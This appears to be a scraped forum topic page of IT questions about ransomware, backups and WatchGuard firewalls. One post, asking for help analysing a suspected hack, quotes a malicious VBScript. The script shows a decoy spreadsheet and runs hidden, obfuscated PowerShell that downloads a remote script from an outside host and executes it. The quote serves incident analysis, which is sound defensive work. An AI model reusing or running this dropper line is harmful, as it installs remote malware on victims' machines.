[Product update] Infrastructure Analysis Tool is now available with Business Accounts.Learn More

x

Ransomware

176

Solutions

433

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.

Share tech news, updates, or what's on your mind.

Sign up to Post

I have shadow copies enabled on the c:\ of a Windows 2012 server, I currently have it set to the below configuration;

Maximum Size: 35MB
Schedule: Twice a day at 06:00 and 13:00

The server also has Acronis Backup installed and running multiple backup jobs to a local NAS and also to Acronis Cloud.

I've noticed that the shadow copy setting maximum constantly resets to no limit but I can't understand why.

Please can someone offer any advise on why this occurs and how best to stop this being reset.
0
Check Out How Miercom Evaluates Wi-Fi Security!
Check Out How Miercom Evaluates Wi-Fi Security!

It's not just about Wi-Fi connectivity anymore. A wireless security breach can cost your business large amounts of time, trouble, and expense. Plus, hear first-hand from Miercom on how WatchGuard's Wi-Fi security stacks up against the competition plus a LIVE demo!

I have a customer that was hit with the ACCDFISA v2.0 Ransomware they had the backup drive mounted so it seems like it deleted the files not encrypted.  is there any solution to this? they are asking for $4000 in Bitcoin.  

Thanks.
0
Hi,

We use Mitel 5212 IP Phones. we are trying to get them to work on a custom VLAN setup on a watchguard m500 firewall. We have created the custom vlan and the ip scope which works fine. I have mimicked the DHCP options from our windows based dhcp server, however this didn't work. On the DHCP windows based DHCP server the options are:

128 Mitel TFTP xxxx.xxxx.xxxx.xxxx
129 Mitel RTC xxxx.xxxx.xxxx.xxxx
130 Mitel IP Phone Identifier MITEL IP PHONE
132 VLAN for Mitel IP Phone 0x3
133 priority for Mitel IP Phone 0x6

On the firewall dhcp scop options 9All custom)
Code       Name                                 Type            Value
128         Mitel TFTP                           IP                  xxxxxx
129         Mitel RTC                            IP                    xxxxxx
130        Mitel IP Phone Identifier  Text              MITEL IP PHONE
132        VLAN for Mitel IP Phone   Hex              3
133        Priority for Mitel IP phone Hex             6

When the phone eventually boots it gets a crazy VLAN id. Any clues as to what I am issing, or a how to guide on getting the IP phones to work?

Cheers,
Paul
0
Has anyone had any luck with removing/recovering from nozelesn ransomware?
0
Good day

Having issues with Acronis Backup 12.5. I have used it on numerous servers but the one server is giving errors when remotly trying to install the agent.

Acronis Server details
Windows 2012 R2 up to date with patching

Target server
Windows 2012 R2 up to date with patching

I have even disabled AV and firewall on the target server. The installation from the Acronis server will run up to 38% and then fails with the below error

Windows error: (0x80070643) Fatal error during installation




Date and time

Oct 02, 2018, 11:09:50 AM




Code

4




Module

309

Message

TOL: Failed to execute the command. Remote installation


Additional info:

------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"management_server_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"remote_installation_addon_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 140
Module: 69
LineInfo: 0x448BB490B35D3532
Fields: {"$module":"remote_installation_addon_vsa64_10330"}
Message: Request to the remote installation service has failed. This may indicate a connection failure.

Error code: 101
Module: …
0
Hi, i have problem whith download Decrypting Cryakl from https://www.experts-exchange.com/articles/31579/Decrypting-Cryakl-1-4-0-0-1-4-1-0-FAIRYTAIL-Ransomware.html  (and decryptors.blogspot.com). Can help me whith download application?
I want test on CL 1.5.1.0. I have one pc whith this encryptor. I know that he was installed through the RDP, and have some files and log's. Maybe you decryptor can help.
It will then be possible to transfer the information to others.

Thank you.
0
There's a request for "Change runbook" that documents/records changes from Day 1
so that in the event of bad changes (malicious or inadvertent ones) being introduced
over along the line of changes, we can rebuild a server/system back selectively,
dropping the "bad" change so that we can bring up the system to a "clean" slate.

Was told it's not "Change Control" nor CRs that we are looking at here.

I've suggested that a 'bare metal' backup be done with incremental backups (think
EMC has one such product) but this is not what the team requires.

Any document, tools or method are much appreciated.
0
Dear Team,
   My Domain Controller Sysvol folder is affected by ransomware. DC is working fine now .
How do i recreate the sysvol files. I have only one DC and  no backup.

Server OS is Windows 2012.
I cannot reinstall DC since i have my exchange running.
0
Hasn’t happened but just wondering

If my google drive got hit and all files encrypted can I revert back to last weeks clean files ?

So I’m asking does google drove afford any sort of fall back plan for this scenario ?

Thanks
2
I have a user who is using the Watchguard VPN client software. They have been using it on Windows 10 Pro (v 1709) for 6 months without issue. The UAC prompt suddenly started appearing this morning when they try to run the software. No updates for Windows or the software have been installed. I have 60 other users that are using it without this problem also. I am at a loss as to why this would suddenly start needing elevated privileges to run. Does anyone know why this would happen or how to fix it? I am not going to disable user account control or give them admin rights.
0
How the Cloud Can Help You as an MSSP
How the Cloud Can Help You as an MSSP

Today, every Managed Security Service Provider (MSSP) needs a platform to deliver effective and efficient security-as-a-service to their customers. Scale, elasticity and profitability are a few of the many features that a Cloud platform offers. Register today to learn more!

hello all,

I am an owner of a small business in my town, I got infected by a ransomware, with .rapid extension, he wants a big ransom that I cant pay.
any solution for this version. please help.
0
I have Acronis for backups to tape.  I want to be able to backup "System State" of my DC.  What files or folders do I need to make sure get backed up?
0
I had this question after viewing Watchguard Firewall xFlow Configuration.
0
Customer has a watchguard T10 firebox firewall for a pos system.  The POS server connects directly to the trusted network port. no other computers connect to that network.  

Customer wants to setup an access point for wifi.  The watchguard has a 3rd port.  I want to activate it as a second network and allow wireless devices to access the internet.  

The watchguard firewall does not have built in wifi.  We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant, there are no office pc's or network printers.

Need suggestions on policy's, the device has contenfilter subscriptions.  I want to enforce them on the 3rd port too if possible.
0
We believe a client has been hacked but can't determine what the vb script is doing to the data, it doesn't look like ransomware.
can you help point us in a direction to what degree this hack could be.

below is the vbscript and a picture of a folder it has been found in. you will see that actual excel doc has been hidden and a fake excel doc in it's place. it looks like when the fake excel doc is run, it opens up the vbscript and the hidden excel doc

VBscript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How to block RFC 1918 and create object-groups and use that object-groups to block any udp traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
We have a Watchguard M200 firewall that we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the fulll 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I´m trying to use programm by James-Gourley to decrypt a 1.4.0.0 version of Cryakl  . Some files are decrypted correctly, and other files are not decrypted with  "encryption signature mismatch" message. Help me please. Sample files https://dropmefiles.com/769Q7   More examples of unencrypted files https://dropmefiles.com/CZ7xH
0
need help with decrypt files after Cryakl 1.5.1/
encrypted and original file attach
0
Microsoft Azure 2017
LVL 12
Microsoft Azure 2017

Azure has a changed a lot since it was originally introduce by adding new services and features. Do you know everything you need to about Azure? This course will teach you about the Azure App Service, monitoring and application insights, DevOps, and Team Services.

I have an urgent issue and can't seem to find an answer. 

The client has server 2012 A software VPN is setup.  Which is no longer working. 
server had GDATA installed which I removed and reinstalled webroot. Then restarted the server.

 Since this I have not been able to get the VPN working again. I have tried running removal tools for Webroot, Gdata and disabled the windows firewall, however, no success at all. Still no VPN access. 

Does anyone have any suggestions ? 

Error is

The network connection between your computer and the VPN server could not be established because the remote server is not responding. This could be because one of the network devices (e.g, firewalls, NAT, routers, etc) between your computer and the remote server is not configured to allow VPN connections. Please contact your Administrator or your service provider to determine which device may be causing the problem.
0
I am having an issue accessing a secure ftp web site from a network.  The network uses a watchguard xtm 25 appliance and then runs Server 2008 R2 as the network server.  The workstations are all Windows 7 Pro.

The URL is https://oebsftp.ontarioenergyboard.ca.  This should bring me to a log in page, but instead the following message

The message from IE 11 is as follows:

This page can’t be displayed


Turn on TLS 1.0, TLS 1.1, and TLS 1.2 in Advanced settings and try connecting to https://oebsftp.ontarioenergyboard.ca  again. If this error persists, it is possible that this site uses an unsupported protocol or cipher suite such as RC4 (link for the details), which is not considered secure. Please contact your site administrator.

Fire fox give the following:
Secure Connection Failed

The connection to oebsftp.ontarioenergyboard.ca was interrupted while the page was loading.

    The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
    Please contact the website owners to inform them of this problem.
Often the Ontario energy board upload sites are designed for IE only.

I do not see anything in the Watchguard appliance but may be overlooking something.

The server uses SEP 14.0 for both anti-virus and Firewall

As a separate issue, email using Outlook 2013 cannot use ssl either
0
HI James ..... I´m back here .... Sadly
I've another computer infected with Fairytail .... I think it´s the same version that i've cleaned earlier.
I´ve Just downloaded your decryptor but i think something went wrong with it.
The earlier version worked fine with me .... but this one seems to give me some trouble. I used it in 3 different PCs' and i received the same error. All of them were running Windows 10 64 bits.
I have a clean file and the same file encrypted to use in the decryptor.
But as soon i select the encrypted file, i receive the error i attach
0
We have a WatchGuard M300. We currently have an internet connection that is too small for our needs. Our issue is the upload speed is capped at 20Mbps. With the M300 can we add a second internet connection and have our internet traffic divided evenly between these two connections?
0
Hi All

This is not a question as such im looking for information ideas on how i can pass VLAN's across a ipsec VPN tunnel

Ive got 16 VLANS that is hosted at one site located a few hundred kilometers away from my secondary site and i want to be able to push the vlans from the main site to the secondary site and then be able to distriube those via a switch at the remote site

The sites currently will be connected via either Sonicwalls or WatchGuard UTM Appliances

Any help or suggestions on this would be greatly appreciated
0
Dear All,

Friend of mines company server got hijacked by embassy@scryptmail.com using  Disk-crypt after much negotiation we got the codes (reduced prices £4000 to £300) so the laptops have all been decrypted; The sever dell using raid 1 mirror Perc S300 controller hasn’t been straight forward; eventually worked out how I had to boot from a alternate SSD with driver an SMB server 2011 etc, I’ve now decrypted the drives even though the server boot BSODS (sort later) but does anyone know how to remove the demand at boot from the MBR please for the password.

Regards
D
0

Ransomware

176

Solutions

433

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.